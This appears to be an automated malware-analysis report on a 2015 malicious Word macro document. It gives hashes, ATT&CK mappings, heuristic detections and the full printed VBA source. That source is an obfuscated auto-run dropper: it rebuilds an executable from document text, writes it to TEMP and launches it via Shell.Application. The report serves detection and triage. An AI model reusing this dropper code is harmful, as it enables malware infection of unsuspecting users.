Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a8552eb60a95d95a…

MALICIOUS

Office (OLE)

236.5 KB Created: 2015-03-15 08:12:00 Authoring application: Microsoft Office Word First seen: 2015-09-18
MD5: 2e7ac168800b5b1e82cfd4b582015c00 SHA-1: d3c65e8270374dec11d6fd4847192db871942141 SHA-256: a8552eb60a95d95a281964913aee09522df57c730ab7fd84ea2ff12472681bba
216 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_PCODE_AUTOEXEC_EXEC. The macros appear to be designed to download and execute a second-stage payload, evidenced by the CreateObject call and the presence of an embedded VBA file named 'macros.bas'. The ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
             Set triangleqXMkTaJfCI = CreateObject(trianglepcJGHnXE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
             Auto_Open
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
             TCnfKXBgswutriangle = Environ("TEMP")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9721 bytes
SHA-256: 9d35d0d50ebabfe54d4dbf164ba1437b602586e611e9bdab61bd4f1de919088c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub CommandButton1_Click()

End Sub

Attribute VB_Name = "Module1"

Attribute VB_Name = "NewMacros"
         
Public Function JAhgLLtAOftriangle(trianglePUaBMjgad As String, bGTLLgAJhtriangle As String) As String
            Dim triangleAfVnhigD As Long
            Dim triangleyYxkiElmUDn As String
            Dim ZmEzVLDElItriangle As Integer
            Dim QIGuHCSGadtriangle As Integer
            

            For triangleAfVnhigD = 1 To (Len(bGTLLgAJhtriangle) / 2)
                ZmEzVLDElItriangle = Val("&H" & (Mid$(bGTLLgAJhtriangle, (2 * triangleAfVnhigD) - 1, 2)))
                QIGuHCSGadtriangle = Asc(Mid$(trianglePUaBMjgad, ((triangleAfVnhigD Mod Len(trianglePUaBMjgad)) + 1), 1))
                triangleyYxkiElmUDn = triangleyYxkiElmUDn + Chr(ZmEzVLDElItriangle Xor QIGuHCSGadtriangle)
            Next triangleAfVnhigD
           JAhgLLtAOftriangle = triangleyYxkiElmUDn
End Function
Sub trianglemwBWGMMlTp()
On Error Resume Next
         Dim triangleqEtWAMru As Integer
         Dim pSezbzuLHtriangle As String
         Dim uWMBAugftriangle As String
         Dim UKnBHtcSVtriangle As String
         Dim nUNpxVjivUtriangle As String
         nUNpxVjivUtriangle = "exe"
         pSezbzuLHtriangle = "."
         uWMBAugftriangle = "trianglefHXmNBva"
         UKnBHtcSVtriangle = uWMBAugftriangle + pSezbzuLHtriangle + nUNpxVjivUtriangle
         triangleqEtWAMru = FreeFile()
             Dim triangletlHMXkDr As String

             If triangletlHMXkDr = "triangleNtAYnBvSBk" Then
               xaUiKKRstriangle ("WEIBgycWNtriangle: 20:51:57")
             End If
         Open UKnBHtcSVtriangle For Binary Access Read Write As triangleqEtWAMru Len = 15012
             Dim BbvDXalzhKtriangle As String

             If BbvDXalzhKtriangle = "OZkGWUHyWdctriangle" Then
               xaUiKKRstriangle ("xoUlHujVVEtriangle: 11:23:29")
             End If
End Sub

Sub Workbook_Open()
On Error Resume Next
         Auto_Open
End Sub

Sub triangleFjdhqDbCiU(triangleeUcxbByCgA As String)
On Error Resume Next
         Dim trianglepcJGHnXE
         Dim triangleqXMkTaJfCI As Object
         Dim triangleHEhUQLKQIHG
         Dim TCnfKXBgswutriangle As String
             Dim kjGSDPNzutriangle As String

             If kjGSDPNzutriangle = "triangleEmmQkjfGuom" Then
               xaUiKKRstriangle ("triangleiAhOxcwWYA: 21:12:10")
             End If
         TCnfKXBgswutriangle = Environ("TEMP")
             Dim CoFdvuBxRtriangle As String

             If CoFdvuBxRtriangle = "fgMsYOtqlVEtriangle" Then
               xaUiKKRstriangle ("rvpWICMTLtriangle: 23:10:20")
             End If
         ChDrive (TCnfKXBgswutriangle)
             Dim cXUutkqcMctriangle As String

             If cXUutkqcMctriangle = "triangleZkTkKrnI" Then
               xaUiKKRstriangle ("UvDahWYWpoitriangle: 19:11:31")
             End If
         ChDir (TCnfKXBgswutriangle)

             Dim iaZGUukUChTtriangle As String

             If iaZGUukUChTtriangle = "lxMnTKrctriangle" Then
               xaUiKKRstriangle ("iHIbGTURDtriangle: 14:43:40")
             End If
         triangleHEhUQLKQIHG = "Sh" & "e" & Chr(108)
             Dim triangleAmatLxBsgC As String

             If triangleAmatLxBsgC = "bKLHuEhHFtriangle" Then
               xaUiKKRstriangle ("trianglexQDIVPgHcZr: 14:13:12")
             End If
         trianglepcJGHnXE = triangleHEhUQLKQIHG & Chr(108) & ".Application"
         Set triangleqXMkTaJfCI = CreateObject(trianglepcJGHnXE)
             Dim FJkcANKvDQtriangle As String

             If FJkcANKvDQtriangle = "kLOLeSNPtriangle" Then
               xaUiKKRstriangle ("triangleQuaSwKDd: 14:34:22")
             End If
         triangleqXMkTaJfCI.Open (TCnfKXBgswutriangle & "\" & triangleeUcxbByCgA)

             Dim triangleafuDWxjMS As String

             If triangleafuDWxjMS = "OXaDZscmtriangle" Then
               xaUiKKRstriangle ("triangleoTirYqBK: 10:22:53")
             End If
         CYQjYIunmtriangle
End Sub

Sub AutoOpen()
On Error Resume Next
         Auto_Open
End Sub

Sub triangleGebcKFhE()
On Error Resume Next
         Dim triangleHaMiMeDjJy As Byte
         Dim TCnfKXBgswutriangle As String
         Dim BFbrfeYWMtriangle As Long
         Dim triangleVeYYXTMwN As Paragraph
         Dim LCMngxKhertriangle As String
         Dim triangleqEtWAMru As Integer
         Dim UKnBHtcSVtriangle As String
         Dim ESirQRmCEKxtriangle As String
         Dim triangleeCIuJtMt As InlineShape
         Dim triangleSaItgaQAd As Integer
         Dim triangleULNyUwXjeuv As Boolean
         Dim uWMBAugftriangle As String
         Dim nUNpxVjivUtriangle As String
         pSezbzuLHtriangle = "."
         nUNpxVjivUtriangle = "exe"
         uWMBAugftriangle = "trianglefHXmNBva"
         LCMngxKhertriangle = "iRETYJkkQEtriangle"
             Dim triangleWTXgZKkBsFl As String

             If triangleWTXgZKkBsFl = "KtUhjQedtriangle" Then
               xaUiKKRstriangle ("FGmglRarlatriangle: 12:12:33")
             End If
        For Each triangleeCIuJtMt In ActiveDocument.InlineShapes
        triangleeCIuJtMt.Delete
        Next triangleeCIuJtMt
        
         Selection.HomeKey Unit:=wdStory
         Selection.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
         JAhgLLtAOftriangle("triangleKuDMEqAdaj", "3b2722223228201b3c07191023044441481c061d115448430c251b2b3b2405280b0f02011047050b481b1566162b2331142f104e0319130e0440170415741c207074417354564c10131d0053454c392f55"), PreserveFormatting:=True

         UKnBHtcSVtriangle = uWMBAugftriangle + pSezbzuLHtriangle + nUNpxVjivUtriangle
             Dim triangleRaQDswkEC As String

             If triangleRaQDswkEC = "triangleGzDuKFSfk" Then
               xaUiKKRstriangle ("COHDWVoqPtriangle: 11:10:23")
             End If
         TCnfKXBgswutriangle = Environ("TEMP")
             Dim ydZVzBJhftriangle As String

             If ydZVzBJhftriangle = "triangledQxkRLIokM" Then
               xaUiKKRstriangle ("tWTOxzoaUYtriangle: 11:22:49")
             End If
         ChDrive (TCnfKXBgswutriangle)
             Dim UvxnsrbPQqPtriangle As String

             If UvxnsrbPQqPtriangle = "triangleFXkuNFoicBB" Then
               xaUiKKRstriangle ("wysmVCeHlstriangle: 17:26:20")
             End If
         ChDir (TCnfKXBgswutriangle)
         triangleqEtWAMru = FreeFile()

         trianglemwBWGMMlTp

             Dim WiCuAPpdUXotriangle As String

             If WiCuAPpdUXotriangle = "bkzFBKyIGGtriangle" Then
               xaUiKKRstriangle ("trianglemRMxmAcA: 10:16:10")
             End If
         For Each triangleVeYYXTMwN In ActiveDocument.Paragraphs
                 trianglemDoNZojiE (triangleVeYYXTMwN)
                 ESirQRmCEKxtriangle = triangleVeYYXTMwN.Range.Text
             Dim VoyhdLZQjtriangle As String

             If VoyhdLZQjtriangle = "triangleRtjyEkFFBQ" Then
               xaUiKKRstriangle ("mLZsNkSttriangle: 21:24:43")
             End If
                 If (triangleULNyUwXjeuv = True) Then

                         BFbrfeYWMtriangle = 1
                 Dim TDeFppzEHatriangle As Integer
                 TDeFppzEHatriangle = 2
                 Dim trianglevOPEzAvRRxa As String
                 Dim triangleSLnXVEcmt As Long
                 Dim LQbCPPxktriangle As Long
                 Dim PcMlUEIUcktriangle As Long
                 LQbCPPxktriangle = 0
                 triangleSLnXVEcmt = Len(ESirQRmCEKxtriangle)
                 PcMlUEIUcktriangle = 77824
                 ReDim triangleyKIdMVwUqh(0 To PcMlUEIUcktriangle - 1) As Byte

                         While (BFbrfeYWMtriangle < triangleSLnXVEcmt)
                                 trianglevOPEzAvRRxa = Mid(ESirQRmCEKxtriangle, BFbrfeYWMtriangle, 1)
                                         If trianglevOPEzAvRRxa = " " Then
                                                 BFbrfeYWMtriangle = BFbrfeYWMtriangle + 1
                                         End If
                                 triangleyKIdMVwUqh(LQbCPPxktriangle) = CByte("&H" & Mid(ESirQRmCEKxtriangle, BFbrfeYWMtriangle, TDeFppzEHatriangle))
                                 BFbrfeYWMtriangle = BFbrfeYWMtriangle + TDeFppzEHatriangle
                                         LQbCPPxktriangle = LQbCPPxktriangle + 1
                         Wend
                 ElseIf (InStr(1, ESirQRmCEKxtriangle, LCMngxKhertriangle) > 0 And Len(ESirQRmCEKxtriangle) > 0) Then
                         Dim oEjCNshPElTtriangle As Boolean
                         oEjCNshPElTtriangle = True
                         triangleULNyUwXjeuv = oEjCNshPElTtriangle
                 End If
                 Next
         xaUiKKRstriangle ("22:10:42")
                 Put #triangleqEtWAMru, 1, triangleyKIdMVwUqh
         Close #triangleqEtWAMru
         triangleFjdhqDbCiU (UKnBHtcSVtriangle)
End Sub

Sub xaUiKKRstriangle(OfirIHRYtriangle As String)
On Error Resume Next
         If OfirIHRYtriangle = "2" Then
         MsgBox (OfirIHRYtriangle)
         End If
End Sub

Sub trianglemDoNZojiE(edMyOubrtriangle)
On Error Resume Next
         DoEvents
End Sub

Sub Auto_Open()
On Error Resume Next
         triangleGebcKFhE
End Sub

Sub CYQjYIunmtriangle()
On Error Resume Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.